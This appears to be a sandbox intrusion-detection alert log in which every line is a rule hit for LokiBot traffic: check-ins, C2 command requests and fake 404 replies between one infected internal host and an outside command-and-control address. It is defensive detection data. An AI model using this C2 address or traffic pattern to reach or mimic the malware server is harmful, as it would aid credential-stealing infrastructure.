                                                              2025-01-07T11:03:09.979695+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550082172.245.123.1180TCP
                                                              2025-01-07T11:03:09.979695+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550082172.245.123.1180TCP
                                                              2025-01-07T11:03:09.979775+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550082TCP
                                                              2025-01-07T11:03:10.132210+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550083172.245.123.1180TCP
                                                              2025-01-07T11:03:10.132210+01002025381ET MALWARE LokiBot Checkin1192.168.2.550083172.245.123.1180TCP
                                                              2025-01-07T11:03:10.132210+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550083172.245.123.1180TCP
                                                              2025-01-07T11:03:10.638606+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550083172.245.123.1180TCP
                                                              2025-01-07T11:03:10.638606+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550083172.245.123.1180TCP
                                                              2025-01-07T11:03:10.638618+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550083TCP
                                                              2025-01-07T11:03:10.788630+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550084172.245.123.1180TCP
                                                              2025-01-07T11:03:10.788630+01002025381ET MALWARE LokiBot Checkin1192.168.2.550084172.245.123.1180TCP
                                                              2025-01-07T11:03:10.788630+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550084172.245.123.1180TCP
                                                              2025-01-07T11:03:11.312133+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550084172.245.123.1180TCP
                                                              2025-01-07T11:03:11.312133+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550084172.245.123.1180TCP
                                                              2025-01-07T11:03:11.312316+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550084TCP
                                                              2025-01-07T11:03:11.460089+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550085172.245.123.1180TCP
                                                              2025-01-07T11:03:11.460089+01002025381ET MALWARE LokiBot Checkin1192.168.2.550085172.245.123.1180TCP
                                                              2025-01-07T11:03:11.460089+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550085172.245.123.1180TCP
                                                              2025-01-07T11:03:11.962130+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550085172.245.123.1180TCP
                                                              2025-01-07T11:03:11.962130+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550085172.245.123.1180TCP
                                                              2025-01-07T11:03:11.962187+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550085TCP
                                                              2025-01-07T11:03:12.127099+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550086172.245.123.1180TCP
                                                              2025-01-07T11:03:12.127099+01002025381ET MALWARE LokiBot Checkin1192.168.2.550086172.245.123.1180TCP
                                                              2025-01-07T11:03:12.127099+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550086172.245.123.1180TCP
                                                              2025-01-07T11:03:12.613769+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550086172.245.123.1180TCP
                                                              2025-01-07T11:03:12.613769+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550086172.245.123.1180TCP
                                                              2025-01-07T11:03:12.618552+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550086TCP
                                                              2025-01-07T11:03:12.756187+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550087172.245.123.1180TCP
                                                              2025-01-07T11:03:12.756187+01002025381ET MALWARE LokiBot Checkin1192.168.2.550087172.245.123.1180TCP
                                                              2025-01-07T11:03:12.756187+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550087172.245.123.1180TCP
                                                              2025-01-07T11:03:13.254814+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550087172.245.123.1180TCP
                                                              2025-01-07T11:03:13.254814+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550087172.245.123.1180TCP
                                                              2025-01-07T11:03:13.259632+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550087TCP
                                                              2025-01-07T11:03:13.399253+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550088172.245.123.1180TCP
                                                              2025-01-07T11:03:13.399253+01002025381ET MALWARE LokiBot Checkin1192.168.2.550088172.245.123.1180TCP
                                                              2025-01-07T11:03:13.399253+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550088172.245.123.1180TCP
                                                              2025-01-07T11:03:13.969827+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550088172.245.123.1180TCP
                                                              2025-01-07T11:03:13.969827+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550088172.245.123.1180TCP
                                                              2025-01-07T11:03:13.969885+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550088TCP
                                                              2025-01-07T11:03:14.117177+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550089172.245.123.1180TCP
                                                              2025-01-07T11:03:14.117177+01002025381ET MALWARE LokiBot Checkin1192.168.2.550089172.245.123.1180TCP
                                                              2025-01-07T11:03:14.117177+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550089172.245.123.1180TCP
                                                              2025-01-07T11:03:14.623238+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550089172.245.123.1180TCP
                                                              2025-01-07T11:03:14.623238+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550089172.245.123.1180TCP
                                                              2025-01-07T11:03:14.627975+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550089TCP
                                                              2025-01-07T11:03:14.771734+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550090172.245.123.1180TCP
                                                              2025-01-07T11:03:14.771734+01002025381ET MALWARE LokiBot Checkin1192.168.2.550090172.245.123.1180TCP
                                                              2025-01-07T11:03:14.771734+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550090172.245.123.1180TCP
                                                              2025-01-07T11:03:15.287763+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550090172.245.123.1180TCP
                                                              2025-01-07T11:03:15.287763+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550090172.245.123.1180TCP
                                                              2025-01-07T11:03:15.287870+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550090TCP
                                                              2025-01-07T11:03:15.503726+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550091172.245.123.1180TCP
                                                              2025-01-07T11:03:15.503726+01002025381ET MALWARE LokiBot Checkin1192.168.2.550091172.245.123.1180TCP
                                                              2025-01-07T11:03:15.503726+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550091172.245.123.1180TCP
                                                              2025-01-07T11:03:16.006105+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550091172.245.123.1180TCP
                                                              2025-01-07T11:03:16.006105+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550091172.245.123.1180TCP
                                                              2025-01-07T11:03:16.010889+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550091TCP
                                                              2025-01-07T11:03:16.146706+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550092172.245.123.1180TCP
                                                              2025-01-07T11:03:16.146706+01002025381ET MALWARE LokiBot Checkin1192.168.2.550092172.245.123.1180TCP
                                                              2025-01-07T11:03:16.146706+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550092172.245.123.1180TCP
                                                              2025-01-07T11:03:16.665049+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550092172.245.123.1180TCP
                                                              2025-01-07T11:03:16.665049+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550092172.245.123.1180TCP
                                                              2025-01-07T11:03:16.665102+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550092TCP
                                                              2025-01-07T11:03:16.829444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550093172.245.123.1180TCP
                                                              2025-01-07T11:03:16.829444+01002025381ET MALWARE LokiBot Checkin1192.168.2.550093172.245.123.1180TCP
                                                              2025-01-07T11:03:16.829444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550093172.245.123.1180TCP
                                                              2025-01-07T11:03:17.417958+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550093172.245.123.1180TCP
                                                              2025-01-07T11:03:17.417958+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550093172.245.123.1180TCP
                                                              2025-01-07T11:03:17.422734+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550093TCP
                                                              2025-01-07T11:03:17.571531+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550094172.245.123.1180TCP
                                                              2025-01-07T11:03:17.571531+01002025381ET MALWARE LokiBot Checkin1192.168.2.550094172.245.123.1180TCP
                                                              2025-01-07T11:03:17.571531+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550094172.245.123.1180TCP
                                                              2025-01-07T11:03:18.071243+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550094172.245.123.1180TCP
                                                              2025-01-07T11:03:18.071243+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550094172.245.123.1180TCP
                                                              2025-01-07T11:03:18.076057+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550094TCP
                                                              2025-01-07T11:03:18.224687+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550095172.245.123.1180TCP
                                                              2025-01-07T11:03:18.224687+01002025381ET MALWARE LokiBot Checkin1192.168.2.550095172.245.123.1180TCP
                                                              2025-01-07T11:03:18.224687+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550095172.245.123.1180TCP
                                                              2025-01-07T11:03:18.730694+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550095172.245.123.1180TCP
                                                              2025-01-07T11:03:18.730694+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550095172.245.123.1180TCP
                                                              2025-01-07T11:03:18.735502+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550095TCP
                                                              2025-01-07T11:03:18.881699+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550096172.245.123.1180TCP
                                                              2025-01-07T11:03:18.881699+01002025381ET MALWARE LokiBot Checkin1192.168.2.550096172.245.123.1180TCP
                                                              2025-01-07T11:03:18.881699+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550096172.245.123.1180TCP
                                                              2025-01-07T11:03:19.380183+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550096172.245.123.1180TCP
                                                              2025-01-07T11:03:19.380183+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550096172.245.123.1180TCP
                                                              2025-01-07T11:03:19.380219+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550096TCP
                                                              2025-01-07T11:03:19.523285+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550097172.245.123.1180TCP
                                                              2025-01-07T11:03:19.523285+01002025381ET MALWARE LokiBot Checkin1192.168.2.550097172.245.123.1180TCP
                                                              2025-01-07T11:03:19.523285+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550097172.245.123.1180TCP
                                                              2025-01-07T11:03:20.048570+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550097172.245.123.1180TCP
                                                              2025-01-07T11:03:20.048570+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550097172.245.123.1180TCP
                                                              2025-01-07T11:03:20.048644+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550097TCP
                                                              2025-01-07T11:03:20.196458+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550098172.245.123.1180TCP
                                                              2025-01-07T11:03:20.196458+01002025381ET MALWARE LokiBot Checkin1192.168.2.550098172.245.123.1180TCP
                                                              2025-01-07T11:03:20.196458+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550098172.245.123.1180TCP
                                                              2025-01-07T11:03:20.702835+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550098172.245.123.1180TCP
                                                              2025-01-07T11:03:20.702835+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550098172.245.123.1180TCP
                                                              2025-01-07T11:03:20.707633+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550098TCP
                                                              2025-01-07T11:03:20.851457+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550099172.245.123.1180TCP
                                                              2025-01-07T11:03:20.851457+01002025381ET MALWARE LokiBot Checkin1192.168.2.550099172.245.123.1180TCP
                                                              2025-01-07T11:03:20.851457+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550099172.245.123.1180TCP
                                                              2025-01-07T11:03:21.357331+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550099172.245.123.1180TCP
                                                              2025-01-07T11:03:21.357331+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550099172.245.123.1180TCP
                                                              2025-01-07T11:03:21.363986+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550099TCP
                                                              2025-01-07T11:03:21.507813+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550100172.245.123.1180TCP
                                                              2025-01-07T11:03:21.507813+01002025381ET MALWARE LokiBot Checkin1192.168.2.550100172.245.123.1180TCP
                                                              2025-01-07T11:03:21.507813+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550100172.245.123.1180TCP
                                                              2025-01-07T11:03:21.997605+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550100172.245.123.1180TCP
                                                              2025-01-07T11:03:21.997605+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550100172.245.123.1180TCP
                                                              2025-01-07T11:03:22.002829+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550100TCP
                                                              2025-01-07T11:03:22.176021+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550101172.245.123.1180TCP
                                                              2025-01-07T11:03:22.176021+01002025381ET MALWARE LokiBot Checkin1192.168.2.550101172.245.123.1180TCP
                                                              2025-01-07T11:03:22.176021+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550101172.245.123.1180TCP
                                                              2025-01-07T11:03:23.056888+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550101172.245.123.1180TCP
                                                              2025-01-07T11:03:23.056888+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550101172.245.123.1180TCP
                                                              2025-01-07T11:03:23.056926+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550101TCP
                                                              2025-01-07T11:03:23.213434+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550102172.245.123.1180TCP
                                                              2025-01-07T11:03:23.213434+01002025381ET MALWARE LokiBot Checkin1192.168.2.550102172.245.123.1180TCP
                                                              2025-01-07T11:03:23.213434+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550102172.245.123.1180TCP
                                                              2025-01-07T11:03:24.002235+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550102172.245.123.1180TCP
                                                              2025-01-07T11:03:24.002235+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550102172.245.123.1180TCP
                                                              2025-01-07T11:03:24.002501+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550102TCP
                                                              2025-01-07T11:03:24.151005+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550103172.245.123.1180TCP
                                                              2025-01-07T11:03:24.151005+01002025381ET MALWARE LokiBot Checkin1192.168.2.550103172.245.123.1180TCP
                                                              2025-01-07T11:03:24.151005+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550103172.245.123.1180TCP
                                                              2025-01-07T11:03:24.672832+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550103172.245.123.1180TCP
                                                              2025-01-07T11:03:24.672832+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550103172.245.123.1180TCP
                                                              2025-01-07T11:03:24.677650+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550103TCP
                                                              2025-01-07T11:03:24.824519+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550104172.245.123.1180TCP
                                                              2025-01-07T11:03:24.824519+01002025381ET MALWARE LokiBot Checkin1192.168.2.550104172.245.123.1180TCP
                                                              2025-01-07T11:03:24.824519+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550104172.245.123.1180TCP
                                                              2025-01-07T11:03:26.568049+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550104172.245.123.1180TCP
                                                              2025-01-07T11:03:26.568049+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550104172.245.123.1180TCP
                                                              2025-01-07T11:03:26.572830+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550104TCP
                                                              2025-01-07T11:03:26.710640+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550105172.245.123.1180TCP
                                                              2025-01-07T11:03:26.710640+01002025381ET MALWARE LokiBot Checkin1192.168.2.550105172.245.123.1180TCP
                                                              2025-01-07T11:03:26.710640+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550105172.245.123.1180TCP
                                                              2025-01-07T11:03:27.233167+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550105172.245.123.1180TCP
                                                              2025-01-07T11:03:27.233167+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550105172.245.123.1180TCP
                                                              2025-01-07T11:03:27.233439+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550105TCP
                                                              2025-01-07T11:03:27.380300+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550106172.245.123.1180TCP
                                                              2025-01-07T11:03:27.380300+01002025381ET MALWARE LokiBot Checkin1192.168.2.550106172.245.123.1180TCP
                                                              2025-01-07T11:03:27.380300+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550106172.245.123.1180TCP
                                                              2025-01-07T11:03:27.880660+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550106172.245.123.1180TCP
                                                              2025-01-07T11:03:27.880660+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550106172.245.123.1180TCP
                                                              2025-01-07T11:03:27.885439+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550106TCP
                                                              2025-01-07T11:03:28.015736+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550107172.245.123.1180TCP
                                                              2025-01-07T11:03:28.015736+01002025381ET MALWARE LokiBot Checkin1192.168.2.550107172.245.123.1180TCP
                                                              2025-01-07T11:03:28.015736+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550107172.245.123.1180TCP
                                                              2025-01-07T11:03:28.538323+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550107172.245.123.1180TCP
                                                              2025-01-07T11:03:28.538323+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550107172.245.123.1180TCP
                                                              2025-01-07T11:03:28.538369+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550107TCP
                                                              2025-01-07T11:03:28.703037+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550108172.245.123.1180TCP
                                                              2025-01-07T11:03:28.703037+01002025381ET MALWARE LokiBot Checkin1192.168.2.550108172.245.123.1180TCP
                                                              2025-01-07T11:03:28.703037+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550108172.245.123.1180TCP
                                                              2025-01-07T11:03:29.206821+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550108172.245.123.1180TCP
                                                              2025-01-07T11:03:29.206821+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550108172.245.123.1180TCP
                                                              2025-01-07T11:03:29.211601+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550108TCP
                                                              2025-01-07T11:03:29.349451+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550109172.245.123.1180TCP
                                                              2025-01-07T11:03:29.349451+01002025381ET MALWARE LokiBot Checkin1192.168.2.550109172.245.123.1180TCP
                                                              2025-01-07T11:03:29.349451+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550109172.245.123.1180TCP
                                                              2025-01-07T11:03:29.874483+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550109172.245.123.1180TCP
                                                              2025-01-07T11:03:29.874483+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550109172.245.123.1180TCP
                                                              2025-01-07T11:03:29.879303+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550109TCP
                                                              2025-01-07T11:03:30.026092+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550110172.245.123.1180TCP
                                                              2025-01-07T11:03:30.026092+01002025381ET MALWARE LokiBot Checkin1192.168.2.550110172.245.123.1180TCP
                                                              2025-01-07T11:03:30.026092+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550110172.245.123.1180TCP
                                                              2025-01-07T11:03:30.549629+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550110172.245.123.1180TCP
                                                              2025-01-07T11:03:30.549629+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550110172.245.123.1180TCP
                                                              2025-01-07T11:03:30.549655+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550110TCP
                                                              2025-01-07T11:03:30.701445+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550111172.245.123.1180TCP
                                                              2025-01-07T11:03:30.701445+01002025381ET MALWARE LokiBot Checkin1192.168.2.550111172.245.123.1180TCP
                                                              2025-01-07T11:03:30.701445+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550111172.245.123.1180TCP
                                                              2025-01-07T11:03:31.244877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550111172.245.123.1180TCP
                                                              2025-01-07T11:03:31.244877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550111172.245.123.1180TCP
                                                              2025-01-07T11:03:31.244883+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550111TCP
                                                              2025-01-07T11:03:31.406580+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550112172.245.123.1180TCP
                                                              2025-01-07T11:03:31.406580+01002025381ET MALWARE LokiBot Checkin1192.168.2.550112172.245.123.1180TCP
                                                              2025-01-07T11:03:31.406580+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550112172.245.123.1180TCP
                                                              2025-01-07T11:03:31.926789+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550112172.245.123.1180TCP
                                                              2025-01-07T11:03:31.926789+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550112172.245.123.1180TCP
                                                              2025-01-07T11:03:31.931632+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550112TCP
                                                              2025-01-07T11:03:32.067627+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550113172.245.123.1180TCP
                                                              2025-01-07T11:03:32.067627+01002025381ET MALWARE LokiBot Checkin1192.168.2.550113172.245.123.1180TCP
                                                              2025-01-07T11:03:32.067627+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550113172.245.123.1180TCP
                                                              2025-01-07T11:03:32.585891+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550113172.245.123.1180TCP
                                                              2025-01-07T11:03:32.585891+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550113172.245.123.1180TCP
                                                              2025-01-07T11:03:32.590737+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550113TCP
                                                              2025-01-07T11:03:32.733953+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550114172.245.123.1180TCP
                                                              2025-01-07T11:03:32.733953+01002025381ET MALWARE LokiBot Checkin1192.168.2.550114172.245.123.1180TCP
                                                              2025-01-07T11:03:32.733953+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550114172.245.123.1180TCP
                                                              2025-01-07T11:03:33.260609+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550114172.245.123.1180TCP
                                                              2025-01-07T11:03:33.260609+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550114172.245.123.1180TCP
                                                              2025-01-07T11:03:33.260811+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550114TCP
                                                              2025-01-07T11:03:33.433270+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550115172.245.123.1180TCP
                                                              2025-01-07T11:03:33.433270+01002025381ET MALWARE LokiBot Checkin1192.168.2.550115172.245.123.1180TCP
                                                              2025-01-07T11:03:33.433270+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550115172.245.123.1180TCP
                                                              2025-01-07T11:03:34.641167+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550115172.245.123.1180TCP
                                                              2025-01-07T11:03:34.641167+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550115172.245.123.1180TCP
                                                              2025-01-07T11:03:34.641210+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550115TCP
                                                              2025-01-07T11:03:34.782674+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550116172.245.123.1180TCP
                                                              2025-01-07T11:03:34.782674+01002025381ET MALWARE LokiBot Checkin1192.168.2.550116172.245.123.1180TCP
                                                              2025-01-07T11:03:34.782674+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550116172.245.123.1180TCP
                                                              2025-01-07T11:03:35.284896+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550116172.245.123.1180TCP
                                                              2025-01-07T11:03:35.284896+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550116172.245.123.1180TCP
                                                              2025-01-07T11:03:35.289758+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550116TCP
                                                              2025-01-07T11:03:35.422766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550117172.245.123.1180TCP
                                                              2025-01-07T11:03:35.422766+01002025381ET MALWARE LokiBot Checkin1192.168.2.550117172.245.123.1180TCP
                                                              2025-01-07T11:03:35.422766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550117172.245.123.1180TCP
                                                              2025-01-07T11:03:35.968310+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550117172.245.123.1180TCP
                                                              2025-01-07T11:03:35.968310+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550117172.245.123.1180TCP
                                                              2025-01-07T11:03:35.973094+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550117TCP
                                                              2025-01-07T11:03:36.111250+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550118172.245.123.1180TCP
                                                              2025-01-07T11:03:36.111250+01002025381ET MALWARE LokiBot Checkin1192.168.2.550118172.245.123.1180TCP
                                                              2025-01-07T11:03:36.111250+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550118172.245.123.1180TCP
                                                              2025-01-07T11:03:36.632563+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550118172.245.123.1180TCP
                                                              2025-01-07T11:03:36.632563+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550118172.245.123.1180TCP
                                                              2025-01-07T11:03:36.637436+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550118TCP
                                                              2025-01-07T11:03:36.787347+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550119172.245.123.1180TCP
                                                              2025-01-07T11:03:36.787347+01002025381ET MALWARE LokiBot Checkin1192.168.2.550119172.245.123.1180TCP
                                                              2025-01-07T11:03:36.787347+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550119172.245.123.1180TCP
                                                              2025-01-07T11:03:37.297198+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550119172.245.123.1180TCP
